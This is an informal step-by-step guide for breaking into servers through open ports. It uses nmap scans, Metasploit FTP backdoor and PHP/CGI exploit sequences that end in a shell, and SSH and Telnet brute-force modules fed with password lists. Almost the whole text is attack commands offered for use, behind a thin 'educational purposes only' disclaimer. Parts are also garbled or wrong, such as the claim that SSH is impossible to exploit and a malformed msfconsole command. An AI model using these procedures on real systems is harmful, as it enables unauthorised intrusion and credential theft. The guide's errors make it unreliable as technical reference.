Open Ports Guide **By ZayyN**

1. ______________________________________________
2. | ╔╗ ╔╗ |
3. | ╔╝╚╗ ║║ |
4. | ╔══╦══╦══╦══╗ ╔══╦══╦╩╗╔╬══╗ ╔══╦╗╔╦╦═╝╠══╗ |
5. | ║╔╗║╔╗║ ═╣╔╗║ ║╔╗║╔╗║╔╣║║ ═╣ ║╔╗║║║╠╣╔╗║ ═╣ |
6. | ║╚╝║╚╝║ ═╣║║║ ║╚╝║╚╝║║║╚╬═ ║ ║╚╝║╚╝║║╚╝║ ═╣ |
7. | ╚══╣╔═╩══╩╝╚╝ ║╔═╩══╩╝╚═╩══╝ ╚═╗╠══╩╩══╩══╝ |
8. | ║║ ║║ ╔═╝║ |
9. | ╚╝ ╚╝ ╚══╝ |
10. |______________________________________________|
11. | |
12. | * Guid written by ZayyN_ |
13. | * Discord: ZayyN_#2829 |
14. |______________________________________________|
15. | |
16. | Requirements: • Linux - OS (Kali, Parrot) |
17. | • nmap |
18. | • msfconsole |
19. | • A little bit of brain cells |
20. |______________________________________________|
21.  
22. ============================
23. About open port exploiting
24. ============================
25.  
26. - The methods that ethical hackers commonly used are very similar and simple...
27. - This guide is for educational purposes only !!!
28. - Do not use these methods without permission !!!
29. - I am not responsible for any of your actions caused by this manual !!!
30.  
31. Common ports ...
32. 80, 88, 443, 21, 22, 23,
33.  
34. ############################################################################################################
35. # #
36. # • FTP - [21 Default] - Possible to exploit #
37. # • SSH - [22 Default] - !! Impossible to exploit !! - Strong security / Brute force is commonly used #
38. # • TELNET - [23 Default] - Old - Ez to exploit - Brute force is commonly used #
39. # • HTTP - [80, 88 Default] - Possible to exploit #
40. # • HTTPS - [443 Default] - Possible to exploit #
41. # #
42. ############################################################################################################
43.  
44.  
45.  
46. ==========================
47. NMAP
48. ==========================
49. Aggresive scan [Universal scan]
50. • nmap -A <target>
51.  
52. Scan open ports ...
53. • nmap -sV <target>
54.  
55. Scan uncommon open ports ...
56. • nmap -sV -p- <target>
57.  
58.  
59.  
60. ==========================
61. ftp metasploit exploit (only old versions)
62. ==========================
63. 1.) Ping the ftp server for getting ip ...
64. • ping <url-ip>
65.  
66. 2.) Scan open ports with nmap ...
67. • nmap -sV <target>
68.  
69. 3.) Search exploit for current ftp version ... (in terminal)
70. • searchsploit <ftp-version>
71.  
72. 4.) Open msfconsole as root and search ftp version exploit
73. • search <ftp-exploit>
74.  
75. 5.) Then coppy the backdoor exploit name and type following commands
76. • use exploit/unix/ftp/<exploit-version>
77. • set RHOST <ftp-ip>
78. • set RPORT <ftp-port>
79. • set payload cmd/unix/interact
80. • exploit
81.  
82. 6.) When u do all the steps correctly u have to exploit the ftp ... now the shell will pop up
83.  
84.  
85.  
86. ===========================
87. http metasploit exploit (only old versions)
88. ===========================
89. 1.) Ping the server for getting ip ...
90. • ping <url-ip>
91.  
92. 2.) Scan open ports with nmap to get http port... (Default is 80)
93. • nmap -sV <target>
94.  
95. 3.) Open msfconsole as root and search http version exploit
96. • search auxiliary/scanner/http/http_version
97.  
98. 5.) Use the exploit ....
99. • use auxiliary/scanner/http/http_version
100. • set RHOST <http-ip>
101. • set RPORT <http-port>
102. • run
103.  
104. 6.) Now u can clearly see the http version... So we can exploit it more :P Scan for valid php exploits and run in msfconsole
105. • searchsploit <http-version> | grep php -(in terminal)
106. • grep cgi search <php-version> -(in msfconsole)
107. • use 1
108. • show options
109. • set RHOST <http-ip>
110. • set RPORT <http-port>
111. • run
112.  
113. 7.) When corect steps was made... U have full access
114. • Try sysinfo for idetify OS of the php
115.  
116.  
117.  
118. ===========================
119. ssh metasploit bruteforce (all versions)
120. ===========================
121. 1.) Ping the server for getting ip ...
122. • ping <url-ip>
123.  
124. 2.) Scan open ports with nmap to get ssh port...
125. • nmap -sV <target>
126.  
127. 3.) Open msfconsole as root and search ftp version exploit
128. • search auxiliary/scanner/ssh/ssh_login
129.  
130. 5.) Use the exploit ....
131. • use auxiliary/scanner/ssh/ssh_login
132. • set RHOST <ssh-ip>
133. • set RPORT <ssh-port>
134. • set VERBOSE true
135. • set USER_FILE <path>
136. • set PASS_FILE <path>
137. • set STOP_ON_SUCCES true
138. • run
139.  
140. 6.) When corect credential has found u can create session ...
141. • sessions -i 1
142.  
143.  
144.  
145.  
146. ==============================
147. telnet metasploit bruteforce (all versions)
148. ==============================
149. 1.) Ping the server for getting ip ...
150. • ping <url-ip>
151.  
152. 2.) Scan open ports with nmap to get port...
153. • nmap -sV <target>
154.  
155. 3.) Open msfconsole as root and use telnet exploit
156. • use auxiliary/scanner/telnet/telnet_login
157. • set RHOST <target-ip>
158. • set RPORT <telnet-port>
159. • set VERBOSE true
160. • set USER_FILE <path>
161. • set PASS_FILE <path>
162. • set STOP_ON_SUCCES true
163. • run
164.  
165. 4.) When corect credential has found u can create session ...
166. • sessions -i 1
167.  
168.